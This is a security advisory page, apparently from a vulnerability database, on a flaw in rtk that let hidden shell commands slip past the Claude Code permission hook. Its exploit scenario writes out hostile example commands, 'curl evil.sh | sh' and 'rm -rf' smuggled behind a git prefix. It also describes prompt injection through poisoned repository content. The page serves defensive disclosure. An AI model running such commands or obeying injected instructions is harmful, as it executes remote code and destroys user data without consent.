Severity by source
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Local hook on the developer host (AV:L); attacker is unprivileged injected content (PR:N) but needs the user to approve the Claude action (UI:R); arbitrary command execution yields C/I/A:H.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
rtk filters and compresses command outputs before they reach your LLM context. Prior to 0.42.2, the permission splitter did not conservatively split or reject several shell constructs that Bash treats as command execution boundaries or nested execution. As a result, a command beginning with an allowed prefix such as git could hide a second command behind one of these constructs. rtk rewrite returned exit code 0, causing the Claude hook to emit permissionDecision: "allow". The rewritten command still contained the hidden command, so it ran without the user confirmation or denial that the permission rules were intended to enforce. This vulnerability is fixed in 0.42.2.
AnalysisAI
Authorization bypass in rtk (rtk-ai) prior to 0.42.2 allows hidden command execution to slip past the permission splitter that gates the Claude Code permission hook. Because the splitter fails to handle Bash command-execution boundary constructs (such as command substitution and chained operators) inside an allowlisted prefix like git, rtk rewrite returns exit code 0 and the hook emits permissionDecision: "allow", causing the secondary command to execute without the user confirmation the policy was supposed to require. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires (1) rtk at a version below 0.42.2 installed and wired into Claude Code as the permission hook that produces permissionDecision, (2) an allowlist that includes at least one prefix the attacker can lead with (the advisory cites git as an example), (3) attacker-controlled text reaching the LLM context - typically via prompt injection from repository content, tool output, web fetches, or pasted material - and (4) the user accepting the resulting Claude action (UI:R). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD CVSS 3.1 vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H scores 7.8 (High) and is consistent with the described threat model: the attacker is unprivileged content (a malicious prompt or untrusted tool output flowing into the LLM context) that must trick the user into permitting the Claude action, which then runs locally with the user's privileges. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker poisons content that ends up in the developer's Claude Code context - for example a README, issue comment, search result, or tool output - instructing the model to run something like git log; curl evil.sh | sh or git status $(rm -rf ~/important). The user accepts the seemingly benign git action, rtk's splitter sees the git prefix and returns allow with exit code 0, and the chained payload executes locally with the user's privileges. … |
| Remediation | Vendor-released patch: upgrade rtk to 0.42.2 or later, which hardens the permission splitter to conservatively reject or split on Bash command-execution boundary constructs; details are in advisory GHSA-7gxq-fvfc-g327 (https://github.com/rtk-ai/rtk/security/advisories/GHSA-7gxq-fvfc-g327). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all Claude Code deployments and document active permission policies in use. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-863 – Incorrect Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38573